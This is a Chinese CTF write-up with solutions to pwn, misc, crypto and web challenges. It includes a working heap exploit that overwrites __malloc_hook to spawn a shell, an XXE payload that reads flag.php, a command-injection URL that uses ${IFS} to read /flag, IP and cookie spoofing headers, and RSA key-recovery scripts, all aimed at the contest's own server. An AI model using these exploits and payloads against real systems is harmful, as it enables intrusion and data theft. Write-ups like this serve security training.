Pwn
pwn1
- Run函数有个条件竞争,可以泄漏libc,后面libc换了2.27,所以条件竞争配合uaf写fd指针到__malloc_hook然后改为one_gadget即可
from pwn import *
context.log_level = 'debug'
#p = process('./pwn1')
p = remote('119.61.19.212',8087)
def sl(x):
p.sendline(x)
def ru(x):
p.recvuntil(x)
def se(x):
p.send(x)
def malloc(idx,cont):
ru('run\n')
sl('1')
ru('index:\n')
sl(str(idx))
ru('content:\n')
sl(cont)
def free(idx):
ru('run\n')
sl('2')
ru('index:\n')
sl(str(idx))
def run(idx,cont):
ru('run\n')
sl('3')
ru('index:\n')
sl(str(idx))
ru('key:\n')
se(cont)
malloc(0,'aaa') #0
malloc(1,'bbb') #1
malloc(2,'ccc') #2
malloc(3,'ddd') #3
malloc(4,'eee') #4
malloc(5,'fff') #5
malloc(6,'666')
malloc(7,'777')
malloc(8,'888')
for i in range(1,8):
free(str(i))
run(0,'a'*8)
free(0)
ru('run\n')
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak libc : 0x%x'%leak_libc)
libc_base = leak_libc - 96 - 0x3ebc40
info('libc base : 0x%x'%libc_base)
one_gadget = libc_base + 0x4f322
malloc_hook = libc_base + 0x3ebc30
sl('1')
ru('index:\n')
sl('1')
ru('content:\n')
sl('1')
for i in range(2):
malloc('1','1')
run(1,'a')
free(1)
ru('run\n')
leak_heap = u64(p.recv(6).ljust(8,'\x00'))
info('leak heap : 0x%x'%leak_heap)
sl('1')
ru('index:\n')
sl('2')
ru('content:\n')
sl('2')
info('malloc hook : 0x%x'%malloc_hook)
run(2,str(malloc_hook^leak_heap))
free(2)
sleep(2)
malloc(5,'a')
malloc(6,p64(one_gadget))
ru('run\n')
sl('1')
ru('index:\n')
sl('0')
#gdb.attach(p)
p.interactive()
Misc
完美的错误
- 题目描述去除混淆的编码,于是联想到base58,又说错位,所以改一下字符集顺序爆破
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""
long_value = int(v.encode("hex_codec"), 16)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0':
nPad += 1
else:
break
return (__b58chars[0] * nPad) + result
def b58decode(v):
""" decode v into a string of len bytes
"""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base ** i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]:
nPad += 1
else:
break
result = chr(0) * nPad + result
return result
def pailie(a):
aa = a[0]
bb = a[1:]+aa
return bb
if __name__ == "__main__":
for i in range(58):
__b58chars = pailie(__b58chars)
#print b58encode("hello world")
print b58decode("RJv9mjS1bM9MZafGV77uTyDaapNLSk6t358j2Mdf1pbCByjEiVpX")
撸啊撸
- 题目是个图片,拿到以后发现文件头多了点东西,猜测是文件修复
- 谷歌搜了一下__PAGEZERO,发现是Mach-O文件格式,具体可以看https://amywushu.github.io/2017/02/21/基础知识-解读-Mach-O-文件格式.html,于是修复文件头,把0xffffffff改为0xcffaedfe,然后ida打开看,写个异或脚本
a = '938gce1`872db99db`b342d23c0g9g2d'
flag = ""
for i in a:
b = chr(ord(i) ^ 1)
flag += b
print 'flag{'+flag+'}'
脑筋急转弯
- 拿到一个wav文件,猜测是wav隐写,最后用silenteye得到一个压缩包,爆破得到密码654321,然后打开压缩包有个txt
- 把012换成.!?,然后ook,brainfuck解码
抓灰阔
- 一个流量包,仔细找传输的文件,发现main.jsp,再上网找资料,发现是冰蝎一句话木马,所以目前key和加密的payload有了,逐一解密payload
from Crypto.Cipher import AES
key = 'ba4ae3277932b0a2'
cipher = AES.new(key, AES.MODE_ECB)
#print(msg.encode("hex"))
f= open('./data/flag.enc','rb')
data = f.read()
f.close()
msg = data.decode('base64')
#msg = data
decipher = AES.new(key, AES.MODE_ECB)
f = open('./data/flag_dec.class','wb+')
print decipher.decrypt(msg)
b = decipher.decrypt(msg)
#print b
f.write(b)
- 本来想逐一反编译class为java文件,突然发现参数是写在class文件中的,然后找到一个串加密的payload中有上传一个flag文件
- 于是把content的内容拿去base64解码后写入文件中,发现是elf文件,但是格式不对,根据https://blog.csdn.net/xuehuafeiwu123/article/details/72963229把第五字节到七字节修正,然后elf打开
写脚本解密
Crypto
强大的hash
- 给了个hash,需要我们写脚本爆破,这里有个坑点是hash加密类型是$argon2d,不支持php
from argon2 import PasswordHasher
list = ["114","119","110","120","121","122","170","189","180","133","144","911"]
ph = PasswordHasher()
hash = "$argon2d$v=19$m=32768,t=100,p=1$MTIzNDU2Nzg$iuSRO5tkWxBxqgkI5g9O5ZersA//xvgvrKxH8QuxBBI4yKbG4aRFqITP/Rh5giFRuL9PTJP+/0BUfNwZHzx9bQ"
for i in list:
for j in list:
char = 'CTF_' + i + '_' + j
try:
print char
if (ph.verify(hash, char)):
print 'done : ',char
exit(0)
except Exception:
pass
遗失的秘密
- 见到过类似的题目https://www.40huo.cn/blog/rsa-private-key-recovery-and-oaep.html,先把n补全,然后改一改脚本的值,就能跑出flag
#!/usr/bin/python
#-*- coding:utf-8 -*-
import re
import pickle
from itertools import product
from libnum import invmod, gcd
def solve_linear(a, b, mod):
if a & 1 == 0 or b & 1 == 0:
return None
return (b * invmod(a, mod)) & (mod - 1) # hack for mod = power of 2
def to_n(s):
s = re.sub(r"[^0-9a-f]", "", s)
return int(s, 16)
def msk(s):
cleaned = "".join(map(lambda x: x[-2:], s.split(":")))
return msk_ranges(cleaned), msk_mask(cleaned), msk_val(cleaned)
def msk_ranges(s):
return [range(16) if c == " " else [int(c, 16)] for c in s]
def msk_mask(s):
return int("".join("0" if c == " " else "f" for c in s), 16)
def msk_val(s):
return int("".join("0" if c == " " else c for c in s), 16)
E = 65537
N_ = """00:c4:9d:36:a4:77:76:12:12:85:24:6c:74:1d:7d:
b3:ce:f4:c3:a4:69:cd:0b:2e:8f:d6:75:e3:80:b8:
e8:1c:ce:e8:60:90:45:56:73:ab:32:32:00:7f:6a:
76:3e:b6:10:d3:a2:74:da:f9:4e:a5:7e:ae:ef:f4:
da:82:57:6d:68:82:50:d8:b1:fc:92:b1:5c:7d:54:
f5:7e:d0:06:8a:60:ff:82:70:72:20:68:4b:71:ba:
87:44:57:c1:97:a0:8a:2d:53:93:f3:0a:60:87:a3:
85:c8:45:e6:0a:88:85:b5:ff:c7:09:9a:76:03:fe:
99:b6:fb:8a:1e:9f:a8:42:3a:0a:c9:a9:bf:1c:87:
2c:c4:99:10:db:46:e3:a9:a5:79:93:8c:75:71:ec:
c6:3b:af:44:dc:60:c4:53:f6:3c:e8:73:2f:50:10:
38:e7:6f:d0:a5:4b:ae:e3:1e:43:11:42:2c:a2:38:
e6:3f:0b:13:54:63:e8:2f:9e:61:ab:08:65:97:e0:
27:30:19:fd:a7:fe:5c:d8:11:b8:34:87:ad:02:c2:
bc:cd:73:d3:86:be:fd:2a:b4:fe:7d:7e:d3:64:bb:
6f:63:ed:a6:1d:ee:f2:80:da:9d:7a:23:7f:c1:39:
b0:98:0c:85:8f:d0:4b:9f:e4:1a:26:fc:44:d1:67:
03:32:03:0c:91:61:23:4c:81:6f:42:18:88:41:dc:
27:55:a3:07:7c:a1:ad:f3:58:4d:91:07:65:f1:63:
f2:34:d5:17:0e:59:c6:bb:b6:6d:7d:0c:d2:64:4b:
b9:9c:52:59:03:8e:2a:43:23:76:33:c3:e8:72:3b:
1c:e0:40:97:36:5f:ae:00:d7:e3:09:eb:df:55:44:
22:b4:09:00:b5:09:41:70:6c:5c:3b:98:d3:34:7e:
60:a2:b8:93:bd:af:32:77:48:48:8a:a5:9c:0e:6a:
a1:79:36:86:8c:e9:3f:b1:a2:a7:4a:3a:d8:d6:f6:
dd:62:d8:ae:9e:13:bb:0c:6b:b1:65:68:0d:7e:58:
3f:68:1e:91:49:13:19:68:2b:fd:3c:5e:52:fa:76:
b0:57:fc:0e:35:d8:71:56:41:06:ef:50:99:56:dd:
d4:9a:1f:d3:46:26:12:9c:15:4b:43:fc:1b:de:c9:
06:ad:82:56:63:c8:a4:83:32:d2:35:05:23:15:52:
d9:0a:73:85:5e:c9:c2:56:af:69:d2:5f:77:04:28:
c8:4c:b9:a6:d4:15:15:b5:15:99:13:ef:a9:a5:de:
5a:74:b1:03:cf:32:a5:03:69:f8:e9:bb:7e:16:31:
5e:43:e7:02:51:ac:c5:f6:bf:ef:1c:74:f7:13:0c:
19:ad:"""
p_ranges, pmask_msk, pmask_val = msk("""00: :05:89: :bd:35: : :23: : : : :84:
: :ed: :70:14: : : :10: : :87: :51:
ea: :97:69: :52: : : : : :ea: : :15:
: :34: :be:11:23: : :34:14: :94: :10:
: :74:87:37:ee:81:62:ee:95: : :dc:49:dd:
: :35: :81: :fa: : : :86: : : :fb:
:93: : :12: :14: :ab:76: :96: : :27:
:21: :04:01:41: :98: :ff: : :12:dc: :
cd: :39:95:30: :47: :fa:ff: :34: :ad: :
:52:02:fa:bc:14:22:22:48:61:62:bd:53: : :
72:08:cb:41:88: : : :63:91:30:fe: : :42:
87: :18:52: :39:dd: :68: :fe:06:88:81: :
: : :ae:fd: : :fb:21:37:59: :53: :fa:
:07:40:eb:33:77:51:64:10:dd: :73: :86:62:
:bf: :79: :34: :bb: :44:ff: :46:fe:90:
ef: :52:ad: : :fe: :69:18:89:bd:cd:09:46:
: :74:71: : : :41:66: : :11: :25: :
39:8b""")
q_ranges, qmask_msk, qmask_val = msk("""00:ce:43:ef: :76:58:17:43:31: : :32:70: :
89: : :36:55:06: :79:66:78: : : : : :
:85: : : : : :33:bb: : :56: :66:cb:
:08: : :90:cb: : :24:fa:ca:47: : : :
:88: :83:01: :62: : : : : : :ad:ae:
: : :58: :ec: : : :09:04:86: :05:00:
:df:50:84:81:80: :ae: :24: :94:da: :04:
ce: :ef: : :ed:be:bf:43:78: : :05:93: :
08:52:05: : : : :ae: : : : :ab: : :
:76:ce: : : : :19:bd:22: :ef:dc:bf:ea:
ab:78:01: : :85: : : :ea: : :fb: : :
92:66:19: : :ab: : :82: : :31: : :da:
82: :13:82:43: : :94:13:41: : : :37: :
:04:56:02:87:dd: :58:27: : :24: : : :
28: : :09:14:89: : : :49:59: :16:eb:65:
:01:22: : :dd: :78: : :db:90: :ac: :
:fd: :03:74: : : : :92: :00:ba: : :
:05""")
_, dmask_msk, dmask_val = msk("""11: : :69:62:64: : : : :15: :13:de:de:
cf: : :17: : :75: :98:42:fc: :12:15:08:
: : : : :36: :be:25:48: : :19: : :
:47:11:19: :03: :49:fc:da: :96:45:eb: :
: : :91: :ea: : :55:ff: :37:58: : :
19: : :73:40: :91:15:01:da:91:22:fd:32: :
: :50: : :66: : : :42: : :ef: : :
df:42: :97:30: :39: : : : : : :dc: :
: : : : :38: : : :88:28: :05: : :
78:59:fa: :86: :19:24: : : : :da:cf:15:
39: : : : :ef:55: :ce:47: :58:89: :fb:
:24: : : :92: : :ee: : :db:67:31:ce:
:28: :72:ec:89: :04: : :50: : : : :
:37: :44: : : : :56: :38: :bb:47:bb:
66:83:99:22:07:72: : :48:52:02: : : :29:
:82:56: :67: :95: : :56:94: : :71: :
bf:27:98: : :54:98:26:06:87: :ae: :53:be:
: :80:37:60:61:ea:ef:de: : :df:90:81: :
70: :06:33:26: :75:fe:95: :92: :78:cd:05:
64:cc:68: : :36:54: :bd:16:90:ee:60: : :
: :41: : :91: :79:58:06:50: :46: : :
45: :09:ca:ac:16: :27:98: : :ba:82: :77:
93:98:ad: :15: :67:53:97:ad:ee:50:44: :31:
07: :ff:01: :09: : : : : :46: : :42:
15: :db:df:42:be: : : :78: :41: : : :
:14: : :25:fc: :84: : : : : : :20:
da:46:01:eb:87: :12:57: : :56:af: :87:93:
60: :02: :18:89:63:72:ad: :ed:cf: : :84:
:22: :13: : :dd: :ff: : : :de:62:37:
:19:66: : :86:02: :38: : : : :ec:14:
12: :43:93:19:65:98: : :03: : : :ef: :
: :ca:07:92:22: : :bb:15:eb: : : :35:
:72:29:cd: : :99: : : : :41:06: : :
:43:33: :32: : :54:be:92:62: :78:59:42:
79:89""")
_, dpmask_msk, dpmask_val = msk(""" :39: :28:16:02:89:ce:11:fe: : : : :af:
: : :ed:97: : :11:20:ba:ae:98:ad: : :
:10:87:ac:07: : : : :50: : :70:50:52:
df:89:eb:02: : : : :93:11: : :12: :56:
:08: : :ea: :10:fa:19: : : :54:45:07:
: :bc:ff:33: :db:63:49:fe:52: :33: : :
bf:cd:45:91: :10: : :92:81:40:03: :80: :
29: :30: :ed:43:64:ca: :bf:64: : :bf: :
: : :24:72:84: : :ff: : :24: :81:27:
db:23: :64: :67: :ba: : :bc: : : : :
:ae:88: : : : : :91: : :14: :ba:ef:
:89: : : : : : : : :05: :75:52: :
: : :be:ad:df: :02:88:00: : :15:45: :
cf:32: :ca: :93: :32: :40: :27:dd: :19:
73:dc: : : : : :cf: : :dd: : :ca: :
ee: :ca: : : :49: :27: :58:53: :64:25:
:22:06:16:ff:62:bc: : : : :24:fc: : :
df""")
_, dqmask_msk, dqmask_val = msk("""02: :bd: :19:25:98:75: :65: :55:28:33:bc:
34:84:91:01:96: : :08: :32:45: :27: : :
:fe: :bb:63:32:68: :51:bd:75:40: :52:52:
: : :78:85:fc:94: :07: :14: : : : :
15:dd: : :93: :01: : :77:ca: :40: :da:
:89:bc:87:62:dc:ac:61:88: : :70: :69: :
:36: : :21:08: :dc:73: :ad:da:ee:fe: :
96: :58: : :46: :29:ff:97:ce: : : :cb:
51: : :81: :22: : :19: :10:69:41:36:ca:
:22:49: :cc:cf:06: : :08: :76: : :45:
98: : :45: : : :69:13:65: : :da:54: :
19: :ee:24: :73: : : : : : :18:53:40:
21:25: : :84:52:cd: :49:33:78: : :ed: :
25:27: : : :ca: : : :ca: : :bc: :02:
31:70: :10:ca:84:59: : : :52: :27:76: :
47: :66:bf:ff: :03: :99:ff: :df: : : :
:46:27:45: :65:07: :48:da:dc: :80: : :
f9""")
def search(K, Kp, Kq, check_level, break_step):
max_step = 0
cands = [0]
for step in range(1, break_step + 1):
#print " ", step, "( max =", max_step, ")"
max_step = max(step, max_step)
mod = 1 << (4 * step)
mask = mod - 1
cands_next = []
for p, new_digit in product(cands, p_ranges[-step]):
pval = (new_digit << ((step - 1) * 4)) | p
if check_level >= 1:
qval = solve_linear(pval, N & mask, mod)
if qval is None or not check_val(qval, mask, qmask_msk, qmask_val):
continue
if check_level >= 2:
val = solve_linear(E, 1 + K * (N - pval - qval + 1), mod)
if val is None or not check_val(val, mask, dmask_msk, dmask_val):
continue
if check_level >= 3:
val = solve_linear(E, 1 + Kp * (pval - 1), mod)
if val is None or not check_val(val, mask, dpmask_msk, dpmask_val):
continue
if check_level >= 4:
val = solve_linear(E, 1 + Kq * (qval - 1), mod)
if val is None or not check_val(val, mask, dqmask_msk, dqmask_val):
continue
if pval * qval == N:
print "Kq =", Kq
print "pwned"
print "p =", pval
print "q =", qval
p = pval
q = qval
d = invmod(E, (p - 1) * (q - 1))
coef = invmod(p, q)
from Crypto.PublicKey import RSA
print RSA.construct(map(long, (N, E, d, p, q, coef))).exportKey()
quit()
cands_next.append(pval)
if not cands_next:
return False
cands = cands_next
return True
def check_val(val, mask, mask_msk, mask_val):
test_mask = mask_msk & mask
test_val = mask_val & mask
return val & test_mask == test_val
# K = 4695
# Kp = 15700
# Kq = 5155
for i in range(0xff):
N = N_ + hex(i)[2:].rjust(2,'0')
N = to_n(N)
print "index : ",i
for K in range(1, E):
# if K % 100 == 0:
# print "checking", K
if search(K, 0, 0, check_level=2, break_step=20):
print "K =", K
break
for Kp in range(1, E):
# if Kp % 1000 == 0:
# print "checking", Kp
if search(K, Kp, 0, check_level=3, break_step=30):
print "Kp =", Kp
break
for Kq in range(1, E):
# if Kq % 100 == 0:
# print "checking", Kq
if search(K, Kp, Kq, check_level=4, break_step=9999):
print "Kq =", Kq
break
#!/usr/bin/python
# coding=utf-8
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import gmpy2
p = 30804877236372761296348297513767908130120426767441642194038947059431749919743933282721728129660558520306627781991434638545287122418576024822599938752655436891429241798416041881441469038271460545196755187872022209260074336340748692939443634393492611052850561312058115000234467417922716845989845380178291512893577636848676778152648705150749219629638913963012345388388992649857974643758097581431795569765569985118215469798809551704275008726932734117893757436777110974529289423114881289423038562352073193732977840168067817149865622380253870276206212656648830136975036452877460473463818007722056777837507566352911184181643
q = 26038591288856688238001759665609016744197175469090080494077820415283745172609947555684568450035539489682168553390403854805974969118763740560638548072896648612347287461822059996717273680094814363090434263883250281614203478279438635312321752371517752177819983938115532573238089291708699056464231184039223531822571471611431921747169774540943776543504663419138030516108434288911593973010680364553026970545232818747951718950151516127319881685156986937644295056292836729469548074713781625918117631575942194589642230959265894967721587381648790905383499092379075578245308113268969812469233669312409066969648987454629639842309
N = p*q
e = 65537
#print N
#print e
phin = (p-1)*(q-1)
d = gmpy2.invert(e, phin)
# with open('private.pem', 'r') as f:
# private = RSA.importKey(f)
# oaep = PKCS1_OAEP.new(private)
with open('flag.txt.en', 'rb') as f:
data_enc = int(f.read().encode('hex'),16)
plain = gmpy2.powmod(data_enc, d, N)
plain = hex(plain)[2:]
if len(plain) % 2 != 0:
plain = '0' + plain
print plain.decode('hex')
美好的回忆
利用第二段 爆破key,然后解密
#coding:utf-8
raw ="ood time"
two = [0xCD, 0xD9, 0x3B, 0x0A, 0xCF, 0xAA, 0x2A, 0x1E]
iv = [0x55, 0xE5, 0x9E, 0x0E, 0x27, 0x8A, 0x34, 0x63]
#通过iv 和 密文 和 原文 可以算出 key
key = []
for i in raw:
key.append(ord(i))
t_key =[]
for i in xrange(8):
for j in xrange(256):
if two[i]^j^iv[i] == key[i]:
# t_key.append(chr(key[i]))
t_key.append(j)
print t_key
f = file('flag.txt.encrypted','r')
raw_iv = f.read(8)
flag=''
for i in xrange(7):
enc = f.read(8)
for i in xrange(8):
flag+=chr(ord(raw_iv[i])^t_key[i]^ord(enc[i]))
raw_iv = enc
print flag
悲伤的结局
- 爆破 最后的padding 其他和上一题一样
#coding:utf-8
# print 19 ^ 24 ^ 1
# exit()
raw ="keep away from xiaocui!"
# raw = "have a good time.flag{21cb8c804abb60be5c9befcc928ccf5b}"
BLOCK_SIZE =8
def pad(data):
padding_len = BLOCK_SIZE - len(data) % BLOCK_SIZE
return data + (chr(padding_len) * padding_len).encode()
#存在8种可能性
for i in xrange(8):
print '--------------------'
n=i+1
raw_last = raw[-n-8:-n]
print raw_last
print pad(raw_last)
raw_last = pad(raw_last)
iv = [0x15,0xEC,0x98,0x1C,0x6E,0xCD,0x6A,0x35]
two = [0xDB, 0xDD, 0x3C, 0x5E, 0x91, 0xE7, 0x20, 0x1F]
# two = [0x14, 0xED, 0x9E, 0x1C, 0x38, 0xCC, 0x2E, 0x0D]
two = [0xF7,0x84,0x4B,0xE5,0x61,0x93,0x7B,0x98]
iv =[0x0A,0x23,0x86,0xED,0xB9,0xFF,0x9D,0x81]
# two = [0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]
# two = [0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]
#[247, 83, 193, 36, 156, 73, 115, 24]
# two = [0xEB,0xB6,0x57,0x30,0xAC,0x8D,0x55,0x1D]
# iv = [0x14,0xED,0x9E,0x1C,0x38,0xCC,0x2E,0x0D]
# 通过iv 和 密文 和 原文 可以算出 key
[0xE5, 0x20, 0xD1, 0x51, 0x08, 0xDB, 0x11, 0xF3]
[0x56, 0x04, 0xEB, 0xA1, 0xDA, 0xB7, 0xFD, 0xF7]
[0xFD, 0xA7, 0x71, 0xBC, 0x13, 0x9E, 0x13, 0xBC]
[0x4C, 0x08, 0xAE, 0xA6, 0x92, 0xBC, 0xFC, 0xA3]
[0xB1, 0xBA, 0x66, 0xBA, 0x5F, 0x89, 0x5C, 0xA1]
[0x02, 0x5C, 0xA8, 0xBB, 0x9B, 0xAC, 0xAE, 0xEA]
[0xB7, 0xFF, 0x73, 0xA0, 0x4E, 0x93, 0x02, 0xA1]
[0x08, 0x4C, 0xBD, 0xE9, 0x86, 0xB1, 0xA2, 0xBE]
[0xBD, 0xEF, 0x6E, 0xF2, 0x07, 0x98, 0x5B, 0xB0]
[0x13, 0x07, 0xDE, 0xCC, 0xCE, 0xBD, 0xB8, 0xB3]
[0xE2, 0xE1, 0x05, 0xD6, 0x4F, 0x85, 0x50, 0xBD]
[0x46, 0x07, 0xD4, 0xD6, 0x9D, 0xBA, 0xFC, 0xF6]
[0xF8, 0xAE, 0x00, 0xCC, 0x49, 0x9B, 0x19, 0xB3]
[0x2F, 0x0E, 0xD6, 0xC4, 0x8F, 0xAC, 0xA9, 0xBD]
[0xCA, 0xFA, 0x0A, 0x9C, 0x4B, 0xD5, 0x4B, 0xE1]
[0x22, 0x0A, 0x88, 0xCD, 0x88, 0xAD, 0xAE, 0xBC]
[0x9B, 0xFF, 0x0B, 0xC7, 0x19, 0xD9, 0x48, 0xE6]
[0x70, 0x0C, 0x80, 0xCD, 0x81, 0xA6, 0xB5, 0x87]
[0xFE, 0xA5, 0x1A, 0xFD, 0x4F, 0x9F, 0x5B, 0x8B]
[0x0F, 0x30, 0xCF, 0xB4, 0xBD, 0xBA, 0xB6, 0x90]
[0xBE, 0x93, 0x59, 0x8E, 0x73, 0xD6, 0x78, 0x9A]
[0x0A, 0x23, 0x86, 0xED, 0xB9, 0xFF, 0x9D, 0x81]
iv = [0xF7, 0x84, 0x4B, 0xE5, 0x61, 0x93, 0x7B, 0x98]
two =[0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]
[0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]
#
key = []
for i in raw_last:
key.append(ord(i))
t_key = []
for i in xrange(8):
for j in xrange(256):
if two[i] ^ j ^ iv[i] == key[i]:
# t_key.append(chr(key[i]))
t_key.append(j)
print t_key
f = file('flag.txt.encrypted', 'r')
raw_iv = f.read(8)
flag = ''
for i in xrange(24):
enc = f.read(8)
for i in xrange(8):
flag += chr(ord(raw_iv[i]) ^ t_key[i] ^ ord(enc[i]))
raw_iv = enc
print flag
exit()
Web
XX
- 源码泄漏 index.php~,Xxe 利用
POST /index.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 119.61.19.212:8083
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 225
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]>
<creds>
<user>&xxe;</user>
<pass>111</pass>`</creds>
ping
- 利用ifs绕过空格,利用/flag绕过flag
http://119.61.19.212:8081/index.php?A=a;grep${IFS}fla${IFS}/fla*
小明拒绝
- 头部加上
X-Forwarded-For: 127.0.0.1
Cookie: admin=1
php
- 利用取反
<?php
/**
* Created by PhpStorm.
* User: y0unge
* Date: 2019-09-09
* Time: 17:30
*/
//echo (~urldecode("%8F"));
echo urlencode(~"GetYourFlag");
生成取反的exp
即可
view-source:http://119.61.19.212:8082/index.php?code=(~%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)();
找漏洞
- 存在注入,可以读出信息
- 密码明文
- 模板注入,需要上传模板,由于没找到key,采用爆破的方式访问注入的页面
API
- 扫描目录发现
- 直接有flag
- 常规思路应该是Api目录爆破file参数,读到hack.php文件代码,hack.php写文件
网友评论